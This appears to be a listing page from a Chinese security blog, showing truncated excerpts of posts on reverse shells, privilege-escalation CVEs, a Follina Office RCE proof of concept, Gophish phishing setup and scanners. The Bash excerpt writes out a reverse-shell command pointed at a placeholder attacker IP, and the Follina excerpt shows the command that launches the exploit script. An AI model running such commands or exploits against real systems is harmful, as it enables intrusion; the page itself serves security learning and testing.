最新发布第5页
排序
Centos bond端口聚合
0x01 简介当linux系统上有多个单独网卡,又想充分利用这些网卡,同时对外提供一个统一的网络地址,以使得增大网络的吞吐量,同时也提高网络的可用性,这时就需要bond来帮助我们解决这个问题。Li...
Swagger未授权访问
0x01 Swagger未授权访问Swagger是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。相关的方法,参...
Bash反弹shell
一、Bash介绍 Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的ShellBash 反弹Shell的命令如下:bash -i >&/dev/tcp/攻击机_IP/攻击机端...
Xray扫描器
Xray 是一款功能强大的安全评估工具,主要特性有:检测速度快。发包速度快; 漏洞检测算法高效。支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。代码质量高。编...
Microsoft Office (RCE) 命令执行 POC
漏洞复现本地测试环境:Windows 10Microsoft Office 2019项目地址:https://github.com/chvancooten/follina.py运行验证脚本:运行POC同时启动 Web 服务器:python3 follina.py -m binary -b \w...
Linux Polkit Pkexec本地权限提升漏洞(CVE-2021-4034)
前言polkit (原名PolicyKit)的 pkexec 中存在本地特权提升漏洞,该SUID-root程序默认安装在每个主要的Linux发行版上。该漏洞允许任何非特权用户通过在Linux默认配置中利用此漏洞来获得易受攻...
gophish钓鱼平台搭建
一、背景近期需要组织个应急演练,其中有个科目就是邮件钓鱼,为了这个科目进行相关环境搭建,主要利用Gophish搭建钓鱼平台,由于是使用ubuntu所以使用Postfix+mailutils搭建邮件服务器如果vps...
Netcat反弹Shell
netcat 介绍Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。常用参数如下:参数描述-c指定连接后要执行的shel...
开源IT资产管理软件GLPI
b开源IT资产管理软件GLPI介绍GLPI是法语Gestionnaire libre de parc informatique的缩写,是一款历史悠久的IT资产管理软件GLPI提供功能全面的IT资源管理接口,可以用来建立数据库全面管理...
CVE-2021-3156本地提权漏洞复现
0x00漏洞简述Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-...